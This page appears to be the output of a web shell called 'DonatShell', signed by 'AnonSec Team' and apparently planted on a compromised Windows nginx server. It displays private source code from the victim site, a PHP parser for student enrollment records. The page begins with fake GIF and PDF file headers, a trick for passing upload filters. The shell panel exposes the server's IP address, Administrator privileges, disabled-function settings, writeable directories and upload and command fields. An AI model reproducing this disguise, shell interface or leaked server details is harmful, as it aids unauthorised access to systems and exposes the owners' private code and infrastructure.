GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/Enrollment/parse/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/Enrollment/parse/parseDARS_42Bto_c.phpinc
<?
// Admin/Enrollment/parse/parseDARS_42Bto_c.phpinc
// Parse state 42
// Parse Ed Plan section.
// Searching for:
// ['Class']
// This is a class line or Test Out.

#printVar("$index: \$f_DARSln",$f_DARSln); #printVar('$f_DARSlnAsize',$f_DARSlnAsize); #printVar('$f_DARSlnA',$f_DARSlnA);
#exit;

if ( !isset($DARS['Section'][$sectionName]['Class']) ) {
	$DARS['Section'][$sectionName]['Class'] = array();
	$sectionClassIndex = 0;
	if ( !isset($DARS['LastClassYRTR']) ) $DARS['LastClassYRTR'] = '';
}

$DARS['Section'][$sectionName]['Class'][$sectionClassIndex] = array();
#printVar("$index: \$f_DARSln",$f_DARSln.' '.trim(substr($f_DARSln,29,2)));
$f_ThisYear = trim(substr($f_DARSln,8,2));
if ( $f_ThisYear > 80 ) {
	$f_ThisYear = 1900+$f_ThisYear;
} else {
	$f_ThisYear = 2000+$f_ThisYear;
}
$f_LastClassYRTR = $f_ThisYear*10;
$f_ThisSemester =  trim(substr($f_DARSln,6,2));
$TR = 1;
// This is a Test Out Line
#printVar("$index: \$f_DARSln",$f_DARSln); printVar('$f_DARSlnAsize',$f_DARSlnAsize); printVar('$f_DARSlnA',$f_DARSlnA);
#exit;
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex] = array();
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Semester'] = '';
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Year'] = '';
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Department'] = $f_DARSlnA[5];
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Number'] = $f_DARSlnA[6];
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Credits'] = $f_DARSlnA[2];
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Grade'] = '';
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Legend'] = '';
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Title'] = '';
$DARS['Section'][$sectionName]['Class'][$sectionClassIndex]['Comment'] = $f_DARSln;
$sectionClassIndex++;
?>

Anon7 - 2022
AnonSec Team